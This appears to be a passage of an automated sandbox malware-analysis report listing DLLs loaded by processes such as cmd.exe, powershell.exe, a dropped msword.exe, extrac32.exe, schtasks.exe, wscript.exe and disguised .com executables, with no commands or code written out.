    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: slc.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: pcacli.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: apphelp.dll
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: version.dll
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: kernel.appcore.dll
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: uxtheme.dll
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: shfolder.dll
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: windows.storage.dll
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: wldp.dll
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: propsys.dll
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: profapi.dll
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: riched20.dll
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: usp10.dll
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: msls31.dll
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: textinputframework.dll
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: coreuicomponents.dll
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: coremessaging.dll
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: ntmarta.dll
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: wintypes.dll
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: wintypes.dll
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: wintypes.dll
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: textshaping.dll
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: edputil.dll
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: urlmon.dll
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: iertutil.dll
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: srvcli.dll
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: netutils.dll
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: windows.staterepositoryps.dll
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: sspicli.dll
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: appresolver.dll
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: bcp47langs.dll
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: slc.dll
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: userenv.dll
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: sppc.dll
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: onecorecommonproxystub.dll
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: onecoreuapcommonproxystub.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
    Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: cabinet.dll
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: uxtheme.dll
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textinputframework.dll
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coreuicomponents.dll
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dll
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: ntmarta.dll
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dll
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dll
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dll
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textshaping.dll
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: wsock32.dll
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: version.dll
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: winmm.dll
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: mpr.dll
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: wininet.dll
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: iphlpapi.dll
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: userenv.dll
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: uxtheme.dll
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: kernel.appcore.dll
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: windows.storage.dll
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: wldp.dll
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: ntmarta.dll
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: napinsp.dll
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: pnrpnsp.dll
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: wshbth.dll
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: nlaapi.dll
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: mswsock.dll
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: dnsapi.dll
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: winrnr.dll
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: rasadhlp.dll
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: urlmon.dll
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: iertutil.dll
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: srvcli.dll
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: netutils.dll
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: sspicli.dll
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: fwpuclnt.dll
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: cryptsp.dll
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: rsaenh.dll
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: cryptbase.dll
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: profapi.dll
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: ondemandconnroutehelper.dll
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: winhttp.dll
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: winnsi.dll
    Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dll
    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dll
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comSection loaded: wsock32.dll
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comSection loaded: version.dll
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comSection loaded: winmm.dll
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comSection loaded: mpr.dll
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comSection loaded: wininet.dll
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comSection loaded: iphlpapi.dll
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comSection loaded: userenv.dll
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comSection loaded: uxtheme.dll
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comSection loaded: kernel.appcore.dll
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comSection loaded: windows.storage.dll
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comSection loaded: wldp.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comSection loaded: wsock32.dll
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comSection loaded: version.dll
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comSection loaded: winmm.dll
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comSection loaded: mpr.dll
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comSection loaded: wininet.dll
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comSection loaded: iphlpapi.dll
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comSection loaded: userenv.dll
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comSection loaded: uxtheme.dll
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comSection loaded: kernel.appcore.dll
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comSection loaded: windows.storage.dll
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comSection loaded: wldp.dll
    Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
